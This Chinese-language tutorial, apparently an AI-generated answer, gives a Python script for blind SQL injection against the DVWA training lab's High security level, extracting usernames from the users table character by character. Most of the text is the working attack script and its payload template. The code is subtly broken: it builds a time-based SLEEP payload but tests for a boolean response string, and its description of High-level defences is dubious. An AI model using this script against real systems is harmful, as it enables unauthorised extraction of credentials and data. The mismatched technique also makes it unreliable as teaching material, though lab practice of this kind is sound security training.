### 使用Python脚本在DVWA靶场中实现SQL注入攻击（High级别） 在DVWA（Damn Vulnerable Web Application）靶场中，SQL Injection的High级别安全设置会显著增加攻击难度。这是因为High级别的防护机制通常包括输入验证、转义特殊字符以及限制查询执行时间等措施。为了绕过这些防护，可以结合布尔盲注或时间盲注技术来提取数据库信息。 以下是实现SQL注入攻击的Python脚本示例，使用布尔盲注技术提取`users`表中的用户名和密码： ```python import requests # 配置目标URL和Cookie url = "http://localhost/dvwa/vulnerabilities/sqli_blind/" cookies = {"PHPSESSID": "your_php_session_id", "security": "high"} # 字符集定义 charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.-" # 提取数据库名、表名或字段内容的函数 def extract_data(payload_template, known_value=""): result = "" index = 1 while True: found_char = False for char in charset: payload = payload_template.format(result + char, index) params = {"id": payload, "Submit": "Submit"} response = requests.get(url, params=params, cookies=cookies) # 判断页面是否包含特定字符串（根据DVWA反馈调整） if "exists in the database" in response.text: # 替换为实际反馈 result += char found_char = True print(f"Current result: {result}") index += 1 break if not found_char: break return result # 构造布尔盲注Payload模板 # 示例：判断users表中user字段的第一个字符是否为'a' payload_template = "(SELECT CASE WHEN (SUBSTRING((SELECT user FROM users LIMIT 1 OFFSET 0),{1},1)='{0}') THEN SLEEP(5) ELSE 0 END)" # 提取用户信息 print("Extracting user information...") user_info = extract_data(payload_template) # 输出结果 print(f"User information extracted: {user_info}") ``` #### 脚本说明 1. **布尔盲注原理**： - 脚本通过构造布尔条件，逐个字符猜测数据库中的数据[^3]。 - 如果条件成立，页面会返回特定的响应（例如包含“exists in the database”字符串），否则返回其他内容。 2. **Payload构造**： - `payload_template` 是一个SQL语句模板，用于判断数据库中某字段的值是否满足特定条件。 - 使用 `SUBSTRING` 函数逐位提取字段内容，并通过 `CASE WHEN` 控制逻辑。 3. **安全性考虑**： - 在High级别下，DVWA可能对输入进行过滤，因此需要测试不同的Payload格式以绕过防护[^5]。 - 如果布尔盲注不可行，可以尝试时间盲注（例如使用 `SLEEP()` 函数延迟响应时间）。 4. **依赖库**： - 脚本使用了 `requests` 库发送HTTP请求。如果未安装该库，可以通过以下命令安装： ```bash pip install requests ``` #### 注意事项 - 确保替换脚本中的 `your_php_session_id` 为实际的PHPSESSION值。 - 根据DVWA的具体反馈调整判断条件（例如“exists in the database”）。 - High级别的防护可能需要更复杂的Payload或额外的技术（如绕过WAF规则）。 ---